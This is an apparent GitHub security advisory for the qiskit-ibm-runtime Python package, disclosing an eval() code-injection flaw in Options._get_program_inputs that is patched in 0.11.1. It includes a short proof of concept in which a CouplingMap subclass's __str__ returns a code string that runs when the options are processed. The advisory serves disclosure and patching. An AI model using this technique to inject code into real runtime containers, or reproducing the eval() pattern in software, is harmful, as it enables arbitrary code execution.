Skip to content

Dynamic Variable Evaluation in qiskit-ibm-runtime

Low
jyu00 published GHSA-cq96-9974-v8hm Mar 19, 2024

Package

qiskit-ibm-runtime (python)

Affected versions

>=0.11.0

Patched versions

0.11.1

Description

Summary

An eval() method exists Options._get_program_inputs. This is bad in any case, but especially bad because Options are also used server side, so this has the potential to expose arbitrary code injection in runtime containers, now or at a later time.

Details

qiskit-ibm-runtime/qiskit_ibm_runtime/options/options.py

Line 140 in da94a42

] = eval( # pylint: disable=eval-used

PoC

A local exploit would be something like

from qiskit import transpiler

class BadActor(transpiler.CouplingMap):
    def __str__(self):
        return "print('external code')"

Where print("external code") can be any arbitrary python code string.

Then if you did a normal workflow and used a specifically constructed CouplingMap subclass like BadActor above:

from qiskit_ibm_runtime import QiskitRuntimeService, Session, Options, Sampler
from qiskit import QuantumCircuit

cmap = BadActor.from_line(42)
service = QiskitRuntimeService()
options = Options(optimization_level=1)
options.simulator = dict(coupling_map=cmap))

bell = QuantumCircuit(2)
bell.h(0)
bell.cx(0, 1)
bell.measure_all()

with Session(service=service, backend="ibmq_qasm_simulator") as session:
    sampler = Sampler(session=session, options=options).run(bell)

This will print external code

Impact

Security vulnerability.

Severity

Low
2.8
/ 10

CVSS base metrics

Attack vector
Local
Attack complexity
High
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
None
Integrity
Low
Availability
None
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N

CVE ID

No known CVE

Weaknesses

Credits